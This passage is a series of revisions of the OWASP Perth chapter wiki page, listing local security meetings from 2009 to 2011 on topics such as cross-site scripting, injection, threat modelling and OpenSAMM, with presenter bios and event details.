A panel selected from a variety of industries including representation from security consulting, corporate and vendor will discuss the considerations, options and benefits of employing SEIM technology and processes.

We were fortunate to have Joshua Qwek, one of Perth's OWASP chapter lead, participate in this panel.

=== How mature is your software security process? (Perth AISA May 2010) ===

==== [http://www.aisa.org.au/index.php?page=287 AISA Details] ====

As the security industry continues to change its focus to application
security a lot of companies who rely on software, developed either
internally or externally, are wondering what they can do reduce the risk
of security flaws.

Microsoft's Security Development Lifecycle (SDL) model can look
appealing, however without a clear understanding of what your software
security processes look like, it may be difficult to achieve any real
improvements.

Implementing a holistic end-to-end software security process can often
look like an impossible task, and while the end picture resembles Eden,
it's often the first steps that everyone stumbles on. As the saying goes
"You can't manage what you can't measure", and without a clear
understanding of what your software security processes look like now it's
unlikely that you can achieve any real improvements.

OWASP's Open Software Assurance Maturity Model, or OpenSAMM, aims
to assist organisations, both big and small, in evaluating their existing
software security practices and constructing a measurable, balanced
program to increase their software security.

Wondering how this can help your internal development processes? Want
to have a more rigid process to audit your externally developed software
processes? Then perhaps OWASP's OpenSAMM project can assist.

This meeting will be co-hosted by both the local AISA chapter and the Perth OWASP chapter.

=== Perth OWASP - Perth AISA Technical Day (Dec 2009) ===

==== [http://www.owasp.org/index.php/File:AISA_Perth_TSD_2009_Brochure_-Final.pdf Brochure] ====

The local OWASP boys will be whipping out their flux capacitor to fit as much information as they possibly can into a 2 hour jam-packed session on web app security testing. By providing a flyby of the OWASP Testing Guide, David and Christian aim to demonstrate and explain how to detect security vulnerabilities in your own web applications, including: Cross Site Scripting; Injection Flaws; Cross Site Request Forgery and Session Management Flaws.

Demonstrations will utilise a number of open source and freely available tools, including OWASP's own WebScarab. To provide a yoga-like flexibility to the session all materials and testing environments (an Ubuntu wrapped VMware virtual machine) will be provided to attendees, allowing you to either chase us rapidly down the rabbit hole of the OWASP Top 10, or to take your own time after the session...

The perfect way to spend a lazy Sunday afternoon.

=== Web-based Malware (Sep 2009) ===

==== About the presenter ====
Shlomi Cohen joined IBM with the Watchfire acquisition at August 2007.
Over nine years of experience in web application security in both start-ups and established companies. Emphasis in strategic selling, sales consulting, technical sales and management.
* Leading the Security solution on the WW Rational Tiger sales team
* Work with the customers and the local sales team to form the right security solution
* Development of sale process for multiple products
* Working closely with customers and the product management team in driving the products roadmaps
* Assisting IBM’s growth in acquisition portfolio

Previous to the WW Rational Security Solution leader:
* Managing the technical sales team for Watchfire in the Americas group of IBM
* Watchfire Security Research team manager - A team responsible for various web application security aspects including web application vulnerability research, security product rule updates, enhanced security feature definition, security audits, customer support, marketing and sales assistance
* AppShield Development Manager - Managed the development and QA teams for the AppShield product - a client Server Web Application Firewall

=== Threat Modelling in the Software Development Lifecycle (Feb 2009) ===

One of the most important concepts being promoted in the security industry is security in the software development lifecycle. This concept is important due to two primary factors:
* It is generally recognised that by shifting security activities closer towards the requirements gathering stage, or the design stage, that less vulnerabilities will make their way into the production systems.
* It is also recognised that the cost of mitigating vulnerabilities increases later in the lifecycle.
By walking through a case study I hope to demonstrate the effectiveness of addressing risk during the earlier stage of the software development lifecycle, and that these activities are not solely the responsibility of the "security guy", but all participants in a software project including the project manager, business stakeholders and software designer.
==== About the presenter ====
Christian Frichot is currently employed by Bankwest working within the Security Consulting Services team. His core responsibilities include phishing and online fraud response, security assessments, information risk assessments and other ad-hoc information security consulting. Christian hopes to spend more time in '09 focusing on education and application security, where he feels more effort needs to be applied.

[[Category:OWASP Chapter]]
[[Category:Australia]]

Perth Australia

2011-05-20T11:45:56Z

Xntrik: Shifted SecAU session to previous meetings, and added content for upcoming ANZTB

{{Chapter Template|chaptername=Perth, Western Australia|extra=The chapter leaders are:
* [http://www.owasp.org/index.php/User:Xntrik Christian Frichot]
* [mailto:joshua@qwek.com Joshua Qwek]
* Timothy Bessant
* [mailto:david.taylor@bankwest.com.au David Taylor]|mailinglistsite=http://lists.owasp.org/mailman/listinfo/owasp-Perth|emailarchives=http://lists.owasp.org/pipermail/owasp-Perth}}

<paypal>Perth Australia</paypal>

== Upcoming OWASP Events ==

=== How minor vulnerabilities can do ‘very bad things’ - The Sequel (May 2011) ===

Missed the 2010 AISA Techday session? Haven't made it out to an OWASP event lately? David and Christian are happy to be presenting their updated presentation, including live demos, on the impacts of web application security vulnerabilities at the upcoming Australia / New Zealand Testing Board (ANZTB) SIGIST meeting!

[http://www.anztb.org/calendarinfo.php?eventID=86&cityID=7 ANZTB Event]

Seats are limited so RSVPing is important!

Date: Wednesday 25th May 2011
Time: 5:30pm - 7:30pm
Location: Holiday Inn, Perth, 778-788 Hay Street, Banksia Room
RSVP: [mailto:rsvp@anztb.org rsvp@anztb.org]

== Previous OWASP Meetings ==

=== Cross-site scripting: You don’t always know who the actors are (May 2011) ===

So the time has come. Your company has finally approved the project to update your online web presence. A brand new, whiz-bang Content Management System is being deployed and your developers are frantically coding away to prepare a whole batch of fresh new content. Before you realise it, the delivery date is a week away and you have some security guy screaming at you about cross-site scripting issues!

Cross-site scripting? So what.

Does this experience sound familiar to you?

In this session Christian Frichot will spend some time dissecting this common web application vulnerability, and just how serious its impacts can be. Exploitation of cross-site scripting is no longer just within the realm of nerdy, hacker types, new (and old) tools out there allow this trivial vulnerability to be used for so much more, including keystroke logging, and even forcing your iPhone to dial a number via Skype. For those facing these issues there are plenty of resources which can help, and Christian will cover these as well.

=== How minor vulnerabilities can do ‘very bad things’ (December 2010) ===

The Perth branch of the Australian Information Security Association is pleased to announce details for the second annual Perth AISA Tech day to be held on the 3rd December. This year we are holding the event in the heart of Perth’s CBD thanks to proud AISA supporters L7 Solutions.

Appearing for their second consecutive year, regular AISA and OWASP members Christian and David are following on from last year’s topic. Last year you will remember that the demonstrated a number of classes of vulnerabilities in web applications (XSS, CSRF, SQL Injection etc.). This year they are going to show how relatively minor vulnerabilities can be exploited and leveraged to do ‘very bad things’ ™ to the client browser, the web server or both.

This session will include demonstrations of the BeEF browser exploitation framework and Metasploit.

=== Web Application (In)Security Brief - Injection (September 2010) ===

Having recently run training sessions on web application security for SyScan'10 and Blackhat, we're lucky enough to have Wade Alcorn from NGS to give a brief presentation on "Exploiting and discovering injection" for September's Perth OWASP Meeting. Come on up to Level 46 of the Bankwest Tower to join us discuss web application security with Wade and others. Please RSVP to ensure appropriate seating arrangements and we're hoping to then shift off to the Generous Squire for a quick beverage afterwards!

==== About the presenter ====

Wade Alcorn has experience in numerous aspects of offensive information security assessments. This ranges from bluetooth, reverse engineering and web application assessments to managing large teams of security professionals. Prior to joining NGS, Wade had been responsible for cutting-edge PKI and VPN development using technologies including C/C++ and Java. He has presented at conferences including BlackHat and AusCERT.

=== Security Event and Incident Management" Panel Session (Perth AISA August 2010) ===

==== [http://www.aisa.org.au/index.php?page=301 AISA Details] ====

Log management is a necessary task in Security Management, but is often neglected. There are various pressures being placed on businesses, such as audit and compliance, industry standards (eg PCI, APRA), internal security maturity which have allowed organisations to understand the benefits to be gained from undertaking a SEIM project.

There are many options for organisations looking to develop log management and security incident response processes, which range from open source syslog solutions, through to vendor supplied SEIM products and cloud based monitoring solutions.

A panel selected from a variety of industries including representation from security consulting, corporate and vendor will discuss the considerations, options and benefits of employing SEIM technology and processes.

We were fortunate to have Joshua Qwek, one of Perth's OWASP chapter lead, participate in this panel.

=== How mature is your software security process? (Perth AISA May 2010) ===

==== [http://www.aisa.org.au/index.php?page=287 AISA Details] ====

As the security industry continues to change its focus to application
security a lot of companies who rely on software, developed either
internally or externally, are wondering what they can do reduce the risk
of security flaws.

Microsoft's Security Development Lifecycle (SDL) model can look
appealing, however without a clear understanding of what your software
security processes look like, it may be difficult to achieve any real
improvements.

Implementing a holistic end-to-end software security process can often
look like an impossible task, and while the end picture resembles Eden,
it's often the first steps that everyone stumbles on. As the saying goes
"You can't manage what you can't measure", and without a clear
understanding of what your software security processes look like now it's
unlikely that you can achieve any real improvements.

OWASP's Open Software Assurance Maturity Model, or OpenSAMM, aims
to assist organisations, both big and small, in evaluating their existing
software security practices and constructing a measurable, balanced
program to increase their software security.

Wondering how this can help your internal development processes? Want
to have a more rigid process to audit your externally developed software
processes? Then perhaps OWASP's OpenSAMM project can assist.

This meeting will be co-hosted by both the local AISA chapter and the Perth OWASP chapter.

=== Perth OWASP - Perth AISA Technical Day (Dec 2009) ===

==== [http://www.owasp.org/index.php/File:AISA_Perth_TSD_2009_Brochure_-Final.pdf Brochure] ====

The local OWASP boys will be whipping out their flux capacitor to fit as much information as they possibly can into a 2 hour jam-packed session on web app security testing. By providing a flyby of the OWASP Testing Guide, David and Christian aim to demonstrate and explain how to detect security vulnerabilities in your own web applications, including: Cross Site Scripting; Injection Flaws; Cross Site Request Forgery and Session Management Flaws.

Demonstrations will utilise a number of open source and freely available tools, including OWASP's own WebScarab. To provide a yoga-like flexibility to the session all materials and testing environments (an Ubuntu wrapped VMware virtual machine) will be provided to attendees, allowing you to either chase us rapidly down the rabbit hole of the OWASP Top 10, or to take your own time after the session...

The perfect way to spend a lazy Sunday afternoon.

=== Web-based Malware (Sep 2009) ===

==== About the presenter ====
Shlomi Cohen joined IBM with the Watchfire acquisition at August 2007.
Over nine years of experience in web application security in both start-ups and established companies. Emphasis in strategic selling, sales consulting, technical sales and management.
* Leading the Security solution on the WW Rational Tiger sales team
* Work with the customers and the local sales team to form the right security solution
* Development of sale process for multiple products
* Working closely with customers and the product management team in driving the products roadmaps
* Assisting IBM’s growth in acquisition portfolio

Previous to the WW Rational Security Solution leader:
* Managing the technical sales team for Watchfire in the Americas group of IBM
* Watchfire Security Research team manager - A team responsible for various web application security aspects including web application vulnerability research, security product rule updates, enhanced security feature definition, security audits, customer support, marketing and sales assistance
* AppShield Development Manager - Managed the development and QA teams for the AppShield product - a client Server Web Application Firewall

=== Threat Modelling in the Software Development Lifecycle (Feb 2009) ===

One of the most important concepts being promoted in the security industry is security in the software development lifecycle. This concept is important due to two primary factors:
* It is generally recognised that by shifting security activities closer towards the requirements gathering stage, or the design stage, that less vulnerabilities will make their way into the production systems.
* It is also recognised that the cost of mitigating vulnerabilities increases later in the lifecycle.
By walking through a case study I hope to demonstrate the effectiveness of addressing risk during the earlier stage of the software development lifecycle, and that these activities are not solely the responsibility of the "security guy", but all participants in a software project including the project manager, business stakeholders and software designer.
==== About the presenter ====
Christian Frichot is currently employed by Bankwest working within the Security Consulting Services team. His core responsibilities include phishing and online fraud response, security assessments, information risk assessments and other ad-hoc information security consulting. Christian hopes to spend more time in '09 focusing on education and application security, where he feels more effort needs to be applied.

[[Category:OWASP Chapter]]
[[Category:Australia]]

Perth Australia

2011-03-24T08:11:30Z

Xntrik: Updated with the May 2011 presentation at SecAU

{{Chapter Template|chaptername=Perth, Western Australia|extra=The chapter leaders are:
* [http://www.owasp.org/index.php/User:Xntrik Christian Frichot]
* [mailto:joshua@qwek.com Joshua Qwek]
* Timothy Bessant
* [mailto:david.taylor@bankwest.com.au David Taylor]|mailinglistsite=http://lists.owasp.org/mailman/listinfo/owasp-Perth|emailarchives=http://lists.owasp.org/pipermail/owasp-Perth}}

<paypal>Perth Australia</paypal>

== Upcoming OWASP Events ==

=== Cross-site scripting: You don’t always know who the actors are (May 2011) ===

OWASP Perth is pleased to be presenting at [http://www.secau.org/ SecAU's] May 2011 Security: Special Interest Group meeting.

==== The Brief ====

So the time has come. Your company has finally approved the project to update your online web presence. A brand new, whiz-bang Content Management System is being deployed and your developers are frantically coding away to prepare a whole batch of fresh new content. Before you realise it, the delivery date is a week away and you have some security guy screaming at you about cross-site scripting issues!

Cross-site scripting? So what.

Does this experience sound familiar to you?

In this session Christian Frichot will spend some time dissecting this common web application vulnerability, and just how serious its impacts can be. Exploitation of cross-site scripting is no longer just within the realm of nerdy, hacker types, new (and old) tools out there allow this trivial vulnerability to be used for so much more, including keystroke logging, and even forcing your iPhone to dial a number via Skype. For those facing these issues there are plenty of resources which can help, and Christian will cover these as well.

[http://www.secau.org/wp-content/uploads/2011/03/flyer-2011-5-Cross-site-scripting-you-dont-always-know-who-the-actors-are-WEB.pdf The Brochure]

Date: Wednesday 18th of May, 2011
Time: 3:00 - 4:00 pm (Refreshments from 4:00pm)
Location: ECU Mount Lawley Campus, Building 17, Room 17.103
RSVP: Lisa McCormack on 6304 5176 or [mailto:l.mccormack@ecu.edu.au l.mccormack@ecu.edu.au]

== Previous OWASP Meetings ==

=== How minor vulnerabilities can do ‘very bad things’ (December 2010) ===

The Perth branch of the Australian Information Security Association is pleased to announce details for the second annual Perth AISA Tech day to be held on the 3rd December. This year we are holding the event in the heart of Perth’s CBD thanks to proud AISA supporters L7 Solutions.

Appearing for their second consecutive year, regular AISA and OWASP members Christian and David are following on from last year’s topic. Last year you will remember that the demonstrated a number of classes of vulnerabilities in web applications (XSS, CSRF, SQL Injection etc.). This year they are going to show how relatively minor vulnerabilities can be exploited and leveraged to do ‘very bad things’ ™ to the client browser, the web server or both.

This session will include demonstrations of the BeEF browser exploitation framework and Metasploit.

=== Web Application (In)Security Brief - Injection (September 2010) ===

Having recently run training sessions on web application security for SyScan'10 and Blackhat, we're lucky enough to have Wade Alcorn from NGS to give a brief presentation on "Exploiting and discovering injection" for September's Perth OWASP Meeting. Come on up to Level 46 of the Bankwest Tower to join us discuss web application security with Wade and others. Please RSVP to ensure appropriate seating arrangements and we're hoping to then shift off to the Generous Squire for a quick beverage afterwards!

==== About the presenter ====

Wade Alcorn has experience in numerous aspects of offensive information security assessments. This ranges from bluetooth, reverse engineering and web application assessments to managing large teams of security professionals. Prior to joining NGS, Wade had been responsible for cutting-edge PKI and VPN development using technologies including C/C++ and Java. He has presented at conferences including BlackHat and AusCERT.

=== Security Event and Incident Management" Panel Session (Perth AISA August 2010) ===

==== [http://www.aisa.org.au/index.php?page=301 AISA Details] ====

Log management is a necessary task in Security Management, but is often neglected. There are various pressures being placed on businesses, such as audit and compliance, industry standards (eg PCI, APRA), internal security maturity which have allowed organisations to understand the benefits to be gained from undertaking a SEIM project.

There are many options for organisations looking to develop log management and security incident response processes, which range from open source syslog solutions, through to vendor supplied SEIM products and cloud based monitoring solutions.

A panel selected from a variety of industries including representation from security consulting, corporate and vendor will discuss the considerations, options and benefits of employing SEIM technology and processes.

We were fortunate to have Joshua Qwek, one of Perth's OWASP chapter lead, participate in this panel.

=== How mature is your software security process? (Perth AISA May 2010) ===

==== [http://www.aisa.org.au/index.php?page=287 AISA Details] ====

As the security industry continues to change its focus to application
security a lot of companies who rely on software, developed either
internally or externally, are wondering what they can do reduce the risk
of security flaws.

Microsoft's Security Development Lifecycle (SDL) model can look
appealing, however without a clear understanding of what your software
security processes look like, it may be difficult to achieve any real
improvements.

Implementing a holistic end-to-end software security process can often
look like an impossible task, and while the end picture resembles Eden,
it's often the first steps that everyone stumbles on. As the saying goes
"You can't manage what you can't measure", and without a clear
understanding of what your software security processes look like now it's
unlikely that you can achieve any real improvements.

OWASP's Open Software Assurance Maturity Model, or OpenSAMM, aims
to assist organisations, both big and small, in evaluating their existing
software security practices and constructing a measurable, balanced
program to increase their software security.

Wondering how this can help your internal development processes? Want
to have a more rigid process to audit your externally developed software
processes? Then perhaps OWASP's OpenSAMM project can assist.

This meeting will be co-hosted by both the local AISA chapter and the Perth OWASP chapter.

=== Perth OWASP - Perth AISA Technical Day (Dec 2009) ===

==== [http://www.owasp.org/index.php/File:AISA_Perth_TSD_2009_Brochure_-Final.pdf Brochure] ====

The local OWASP boys will be whipping out their flux capacitor to fit as much information as they possibly can into a 2 hour jam-packed session on web app security testing. By providing a flyby of the OWASP Testing Guide, David and Christian aim to demonstrate and explain how to detect security vulnerabilities in your own web applications, including: Cross Site Scripting; Injection Flaws; Cross Site Request Forgery and Session Management Flaws.

Demonstrations will utilise a number of open source and freely available tools, including OWASP's own WebScarab. To provide a yoga-like flexibility to the session all materials and testing environments (an Ubuntu wrapped VMware virtual machine) will be provided to attendees, allowing you to either chase us rapidly down the rabbit hole of the OWASP Top 10, or to take your own time after the session...

The perfect way to spend a lazy Sunday afternoon.

=== Web-based Malware (Sep 2009) ===

==== About the presenter ====
Shlomi Cohen joined IBM with the Watchfire acquisition at August 2007.
Over nine years of experience in web application security in both start-ups and established companies. Emphasis in strategic selling, sales consulting, technical sales and management.
* Leading the Security solution on the WW Rational Tiger sales team
* Work with the customers and the local sales team to form the right security solution
* Development of sale process for multiple products
* Working closely with customers and the product management team in driving the products roadmaps
* Assisting IBM’s growth in acquisition portfolio

Previous to the WW Rational Security Solution leader:
* Managing the technical sales team for Watchfire in the Americas group of IBM
* Watchfire Security Research team manager - A team responsible for various web application security aspects including web application vulnerability research, security product rule updates, enhanced security feature definition, security audits, customer support, marketing and sales assistance
* AppShield Development Manager - Managed the development and QA teams for the AppShield product - a client Server Web Application Firewall

=== Threat Modelling in the Software Development Lifecycle (Feb 2009) ===

One of the most important concepts being promoted in the security industry is security in the software development lifecycle. This concept is important due to two primary factors:
* It is generally recognised that by shifting security activities closer towards the requirements gathering stage, or the design stage, that less vulnerabilities will make their way into the production systems.
* It is also recognised that the cost of mitigating vulnerabilities increases later in the lifecycle.
By walking through a case study I hope to demonstrate the effectiveness of addressing risk during the earlier stage of the software development lifecycle, and that these activities are not solely the responsibility of the "security guy", but all participants in a software project including the project manager, business stakeholders and software designer.
==== About the presenter ====
Christian Frichot is currently employed by Bankwest working within the Security Consulting Services team. His core responsibilities include phishing and online fraud response, security assessments, information risk assessments and other ad-hoc information security consulting. Christian hopes to spend more time in '09 focusing on education and application security, where he feels more effort needs to be applied.

[[Category:OWASP Chapter]]
[[Category:Australia]]

User:Xntrik

2010-12-21T01:56:09Z

Xntrik:

Christian Frichot

One of the [[Perth_Australia]] OWASP chapter leads.

To learn more about me you can check out http://un-excogitate.org or reach me on [http://twitter.com/xntrik @xntrik] or [mailto:christian.frichot@owasp.org christian.frichot@owasp.org].

Perth Australia

2010-12-17T08:02:43Z

Xntrik: Changed meetings.

{{Chapter Template|chaptername=Perth, Western Australia|extra=The chapter leaders are:
* [http://www.owasp.org/index.php/User:Xntrik Christian Frichot]
* [mailto:joshua@qwek.com Joshua Qwek]
* Timothy Bessant
* [mailto:david.taylor@bankwest.com.au David Taylor]|mailinglistsite=http://lists.owasp.org/mailman/listinfo/owasp-Perth|emailarchives=http://lists.owasp.org/pipermail/owasp-Perth}}

<paypal>Perth Australia</paypal>

== Upcoming OWASP Events ==

Watch this space!

== Previous OWASP Meetings ==

=== How minor vulnerabilities can do ‘very bad things’ (December 2010) ===

The Perth branch of the Australian Information Security Association is pleased to announce details for the second annual Perth AISA Tech day to be held on the 3rd December. This year we are holding the event in the heart of Perth’s CBD thanks to proud AISA supporters L7 Solutions.

Appearing for their second consecutive year, regular AISA and OWASP members Christian and David are following on from last year’s topic. Last year you will remember that the demonstrated a number of classes of vulnerabilities in web applications (XSS, CSRF, SQL Injection etc.). This year they are going to show how relatively minor vulnerabilities can be exploited and leveraged to do ‘very bad things’ ™ to the client browser, the web server or both.

This session will include demonstrations of the BeEF browser exploitation framework and Metasploit.

=== Web Application (In)Security Brief - Injection (September 2010) ===

Having recently run training sessions on web application security for SyScan'10 and Blackhat, we're lucky enough to have Wade Alcorn from NGS to give a brief presentation on "Exploiting and discovering injection" for September's Perth OWASP Meeting. Come on up to Level 46 of the Bankwest Tower to join us discuss web application security with Wade and others. Please RSVP to ensure appropriate seating arrangements and we're hoping to then shift off to the Generous Squire for a quick beverage afterwards!

==== About the presenter ====

Wade Alcorn has experience in numerous aspects of offensive information security assessments. This ranges from bluetooth, reverse engineering and web application assessments to managing large teams of security professionals. Prior to joining NGS, Wade had been responsible for cutting-edge PKI and VPN development using technologies including C/C++ and Java. He has presented at conferences including BlackHat and AusCERT.

=== Security Event and Incident Management" Panel Session (Perth AISA August 2010) ===

==== [http://www.aisa.org.au/index.php?page=301 AISA Details] ====

Log management is a necessary task in Security Management, but is often neglected. There are various pressures being placed on businesses, such as audit and compliance, industry standards (eg PCI, APRA), internal security maturity which have allowed organisations to understand the benefits to be gained from undertaking a SEIM project.

There are many options for organisations looking to develop log management and security incident response processes, which range from open source syslog solutions, through to vendor supplied SEIM products and cloud based monitoring solutions.

A panel selected from a variety of industries including representation from security consulting, corporate and vendor will discuss the considerations, options and benefits of employing SEIM technology and processes.

We were fortunate to have Joshua Qwek, one of Perth's OWASP chapter lead, participate in this panel.

=== How mature is your software security process? (Perth AISA May 2010) ===

==== [http://www.aisa.org.au/index.php?page=287 AISA Details] ====

As the security industry continues to change its focus to application
security a lot of companies who rely on software, developed either
internally or externally, are wondering what they can do reduce the risk
of security flaws.

Microsoft's Security Development Lifecycle (SDL) model can look
appealing, however without a clear understanding of what your software
security processes look like, it may be difficult to achieve any real
improvements.

Implementing a holistic end-to-end software security process can often
look like an impossible task, and while the end picture resembles Eden,
it's often the first steps that everyone stumbles on. As the saying goes
"You can't manage what you can't measure", and without a clear
understanding of what your software security processes look like now it's
unlikely that you can achieve any real improvements.

OWASP's Open Software Assurance Maturity Model, or OpenSAMM, aims
to assist organisations, both big and small, in evaluating their existing
software security practices and constructing a measurable, balanced
program to increase their software security.

Wondering how this can help your internal development processes? Want
to have a more rigid process to audit your externally developed software
processes? Then perhaps OWASP's OpenSAMM project can assist.

This meeting will be co-hosted by both the local AISA chapter and the Perth OWASP chapter.

=== Perth OWASP - Perth AISA Technical Day (Dec 2009) ===

==== [http://www.owasp.org/index.php/File:AISA_Perth_TSD_2009_Brochure_-Final.pdf Brochure] ====

The local OWASP boys will be whipping out their flux capacitor to fit as much information as they possibly can into a 2 hour jam-packed session on web app security testing. By providing a flyby of the OWASP Testing Guide, David and Christian aim to demonstrate and explain how to detect security vulnerabilities in your own web applications, including: Cross Site Scripting; Injection Flaws; Cross Site Request Forgery and Session Management Flaws.

Demonstrations will utilise a number of open source and freely available tools, including OWASP's own WebScarab. To provide a yoga-like flexibility to the session all materials and testing environments (an Ubuntu wrapped VMware virtual machine) will be provided to attendees, allowing you to either chase us rapidly down the rabbit hole of the OWASP Top 10, or to take your own time after the session...

The perfect way to spend a lazy Sunday afternoon.

=== Web-based Malware (Sep 2009) ===

==== About the presenter ====
Shlomi Cohen joined IBM with the Watchfire acquisition at August 2007.
Over nine years of experience in web application security in both start-ups and established companies. Emphasis in strategic selling, sales consulting, technical sales and management.
* Leading the Security solution on the WW Rational Tiger sales team
* Work with the customers and the local sales team to form the right security solution
* Development of sale process for multiple products
* Working closely with customers and the product management team in driving the products roadmaps
* Assisting IBM’s growth in acquisition portfolio

Previous to the WW Rational Security Solution leader:
* Managing the technical sales team for Watchfire in the Americas group of IBM
* Watchfire Security Research team manager - A team responsible for various web application security aspects including web application vulnerability research, security product rule updates, enhanced security feature definition, security audits, customer support, marketing and sales assistance
* AppShield Development Manager - Managed the development and QA teams for the AppShield product - a client Server Web Application Firewall

=== Threat Modelling in the Software Development Lifecycle (Feb 2009) ===

One of the most important concepts being promoted in the security industry is security in the software development lifecycle. This concept is important due to two primary factors:
* It is generally recognised that by shifting security activities closer towards the requirements gathering stage, or the design stage, that less vulnerabilities will make their way into the production systems.
* It is also recognised that the cost of mitigating vulnerabilities increases later in the lifecycle.
By walking through a case study I hope to demonstrate the effectiveness of addressing risk during the earlier stage of the software development lifecycle, and that these activities are not solely the responsibility of the "security guy", but all participants in a software project including the project manager, business stakeholders and software designer.
==== About the presenter ====
Christian Frichot is currently employed by Bankwest working within the Security Consulting Services team. His core responsibilities include phishing and online fraud response, security assessments, information risk assessments and other ad-hoc information security consulting. Christian hopes to spend more time in '09 focusing on education and application security, where he feels more effort needs to be applied.

[[Category:OWASP Chapter]]
[[Category:Australia]]

Perth Australia

2010-11-22T06:42:45Z

Xntrik: Shifted Wades presentation into "previous" and posted details on the techday

{{Chapter Template|chaptername=Perth, Western Australia|extra=The chapter leaders are:
* [http://www.owasp.org/index.php/User:Xntrik Christian Frichot]
* [mailto:joshua@qwek.com Joshua Qwek]
* Timothy Bessant
* [mailto:david.taylor@bankwest.com.au David Taylor]|mailinglistsite=http://lists.owasp.org/mailman/listinfo/owasp-Perth|emailarchives=http://lists.owasp.org/pipermail/owasp-Perth}}

<paypal>Perth Australia</paypal>

== Upcoming OWASP Events ==

=== How minor vulnerabilities can do ‘very bad things’ ===

The Perth branch of the Australian Information Security Association is pleased to announce details for the second annual Perth AISA Tech day to be held on the 3rd December. This year we are holding the event in the heart of Perth’s CBD thanks to proud AISA supporters L7 Solutions.

Appearing for their second consecutive year, regular AISA and OWASP members Christian and David are following on from last year’s topic. Last year you will remember that the demonstrated a number of classes of vulnerabilities in web applications (XSS, CSRF, SQL Injection etc.). This year they are going to show how relatively minor vulnerabilities can be exploited and leveraged to do ‘very bad things’ ™ to the client browser, the web server or both.

This session will include demonstrations of the BeEF browser exploitation framework and Metasploit.

'''Date: Friday the 3rd of December, 2010'''
'''Time: 10:30 - 12:30'''
'''Location: L7 Solutions, 14th floor, 256 Adelaide Terrace, Perth'''
'''More Details: [http://www.aisa.org.au/index.php?page=316 AISA Page]'''

== Previous OWASP Meetings ==

=== Web Application (In)Security Brief - Injection (September 2010) ===

Having recently run training sessions on web application security for SyScan'10 and Blackhat, we're lucky enough to have Wade Alcorn from NGS to give a brief presentation on "Exploiting and discovering injection" for September's Perth OWASP Meeting. Come on up to Level 46 of the Bankwest Tower to join us discuss web application security with Wade and others. Please RSVP to ensure appropriate seating arrangements and we're hoping to then shift off to the Generous Squire for a quick beverage afterwards!

==== About the presenter ====

Wade Alcorn has experience in numerous aspects of offensive information security assessments. This ranges from bluetooth, reverse engineering and web application assessments to managing large teams of security professionals. Prior to joining NGS, Wade had been responsible for cutting-edge PKI and VPN development using technologies including C/C++ and Java. He has presented at conferences including BlackHat and AusCERT.

=== Security Event and Incident Management" Panel Session (Perth AISA August 2010) ===

==== [http://www.aisa.org.au/index.php?page=301 AISA Details] ====

Log management is a necessary task in Security Management, but is often neglected. There are various pressures being placed on businesses, such as audit and compliance, industry standards (eg PCI, APRA), internal security maturity which have allowed organisations to understand the benefits to be gained from undertaking a SEIM project.

There are many options for organisations looking to develop log management and security incident response processes, which range from open source syslog solutions, through to vendor supplied SEIM products and cloud based monitoring solutions.

A panel selected from a variety of industries including representation from security consulting, corporate and vendor will discuss the considerations, options and benefits of employing SEIM technology and processes.

We were fortunate to have Joshua Qwek, one of Perth's OWASP chapter lead, participate in this panel.

=== How mature is your software security process? (Perth AISA May 2010) ===

==== [http://www.aisa.org.au/index.php?page=287 AISA Details] ====

As the security industry continues to change its focus to application
security a lot of companies who rely on software, developed either
internally or externally, are wondering what they can do reduce the risk
of security flaws.

Microsoft's Security Development Lifecycle (SDL) model can look
appealing, however without a clear understanding of what your software
security processes look like, it may be difficult to achieve any real
improvements.

Implementing a holistic end-to-end software security process can often
look like an impossible task, and while the end picture resembles Eden,
it's often the first steps that everyone stumbles on. As the saying goes
"You can't manage what you can't measure", and without a clear
understanding of what your software security processes look like now it's
unlikely that you can achieve any real improvements.

OWASP's Open Software Assurance Maturity Model, or OpenSAMM, aims
to assist organisations, both big and small, in evaluating their existing
software security practices and constructing a measurable, balanced
program to increase their software security.

Wondering how this can help your internal development processes? Want
to have a more rigid process to audit your externally developed software
processes? Then perhaps OWASP's OpenSAMM project can assist.

This meeting will be co-hosted by both the local AISA chapter and the Perth OWASP chapter.

=== Perth OWASP - Perth AISA Technical Day (Dec 2009) ===

==== [http://www.owasp.org/index.php/File:AISA_Perth_TSD_2009_Brochure_-Final.pdf Brochure] ====

The local OWASP boys will be whipping out their flux capacitor to fit as much information as they possibly can into a 2 hour jam-packed session on web app security testing. By providing a flyby of the OWASP Testing Guide, David and Christian aim to demonstrate and explain how to detect security vulnerabilities in your own web applications, including: Cross Site Scripting; Injection Flaws; Cross Site Request Forgery and Session Management Flaws.

Demonstrations will utilise a number of open source and freely available tools, including OWASP's own WebScarab. To provide a yoga-like flexibility to the session all materials and testing environments (an Ubuntu wrapped VMware virtual machine) will be provided to attendees, allowing you to either chase us rapidly down the rabbit hole of the OWASP Top 10, or to take your own time after the session...

The perfect way to spend a lazy Sunday afternoon.

=== Web-based Malware (Sep 2009) ===

==== About the presenter ====
Shlomi Cohen joined IBM with the Watchfire acquisition at August 2007.
Over nine years of experience in web application security in both start-ups and established companies. Emphasis in strategic selling, sales consulting, technical sales and management.
* Leading the Security solution on the WW Rational Tiger sales team
* Work with the customers and the local sales team to form the right security solution
* Development of sale process for multiple products
* Working closely with customers and the product management team in driving the products roadmaps
* Assisting IBM’s growth in acquisition portfolio

Previous to the WW Rational Security Solution leader:
* Managing the technical sales team for Watchfire in the Americas group of IBM
* Watchfire Security Research team manager - A team responsible for various web application security aspects including web application vulnerability research, security product rule updates, enhanced security feature definition, security audits, customer support, marketing and sales assistance
* AppShield Development Manager - Managed the development and QA teams for the AppShield product - a client Server Web Application Firewall

=== Threat Modelling in the Software Development Lifecycle (Feb 2009) ===

One of the most important concepts being promoted in the security industry is security in the software development lifecycle. This concept is important due to two primary factors:
* It is generally recognised that by shifting security activities closer towards the requirements gathering stage, or the design stage, that less vulnerabilities will make their way into the production systems.
* It is also recognised that the cost of mitigating vulnerabilities increases later in the lifecycle.
By walking through a case study I hope to demonstrate the effectiveness of addressing risk during the earlier stage of the software development lifecycle, and that these activities are not solely the responsibility of the "security guy", but all participants in a software project including the project manager, business stakeholders and software designer.
==== About the presenter ====
Christian Frichot is currently employed by Bankwest working within the Security Consulting Services team. His core responsibilities include phishing and online fraud response, security assessments, information risk assessments and other ad-hoc information security consulting. Christian hopes to spend more time in '09 focusing on education and application security, where he feels more effort needs to be applied.

[[Category:OWASP Chapter]]
[[Category:Australia]]

Perth Australia

2010-08-24T07:55:21Z

Xntrik: pushed the date back 2 weeks.

{{Chapter Template|chaptername=Perth, Western Australia|extra=The chapter leaders are:
